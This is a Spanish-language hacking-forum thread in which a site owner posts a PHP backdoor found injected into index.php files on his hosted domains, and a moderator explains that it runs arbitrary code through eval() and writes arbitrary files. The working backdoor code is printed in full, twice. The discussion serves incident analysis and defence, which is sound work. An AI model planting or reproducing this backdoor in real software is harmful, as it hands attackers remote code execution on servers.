elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  ¿Código maliciosos?... Lo encontré en mi SERVER "/
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Código maliciosos?... Lo encontré en mi SERVER "/  (Leído 1,859 veces)
NetStorm

Desconectado Desconectado

Mensajes: 114


Ver Perfil
¿Código maliciosos?... Lo encontré en mi SERVER "/
« en: 13 Diciembre 2012, 16:15 pm »

Hola muchachos, en esta ocasión les comparto el código que encontré hoy en la mañana en mi server de godaddy.

Código:
<?php       
                                                                                                                                                                                                                                                                                                                                                                  if(isset($_REQUEST['gnobkr_galuh'])) { $hklp_mrzpfa = $_REQUEST['gnobkr_galuh']; eval($hklp_mrzpfa); } if(isset($_REQUEST['wzv_ttbhhc'])) { $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp']; $fjy_qgk = $_REQUEST['wzv_ttbhhc']; file_put_contents($fjy_qgk, $ytyye_fpbqa); }

?>

El contenido estaba dentro de un archivo Index.php, que se había creado en todos los dominios de mi server, tengo varios dominios alojados, cuando cargaba cualquiera de esos dominios se mostraba en blanco, obviamente porque no enviaba las variables que requiere este script. Yo soy programador en php intermedio, pero con este código me basta para hacer desmadres en el servidor. 

¿Sus opiniones? :huh:


En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/
« Respuesta #1 en: 13 Diciembre 2012, 17:17 pm »

Código
  1. <?php
  2. if (isset($_REQUEST['gnobkr_galuh'])) {
  3.    $hklp_mrzpfa = $_REQUEST['gnobkr_galuh'];
  4.    eval($hklp_mrzpfa);
  5. }
  6. if (isset($_REQUEST['wzv_ttbhhc'])) {
  7.    $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp'];
  8.    $fjy_qgk     = $_REQUEST['wzv_ttbhhc'];
  9.    file_put_contents($fjy_qgk, $ytyye_fpbqa);
  10. }

Quizás ya que ejecuta la función eval(), es muy peligroso porque permite la ejecución de código de PHP arbitrario.
Hasta puede subir un archivo al servidor, quizás webshell con la función file_put_contents()


« Última modificación: 13 Diciembre 2012, 17:20 pm por Shell Root » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
NetStorm

Desconectado Desconectado

Mensajes: 114


Ver Perfil
Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/
« Respuesta #2 en: 30 Diciembre 2012, 01:02 am »

Queda claro que al recibir variables con esos nombres que solo el atacante podría conocer, además de ejecutar código arbitrario con "eval" ES MALICIOSO.

TEMA CERRADO!

Gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines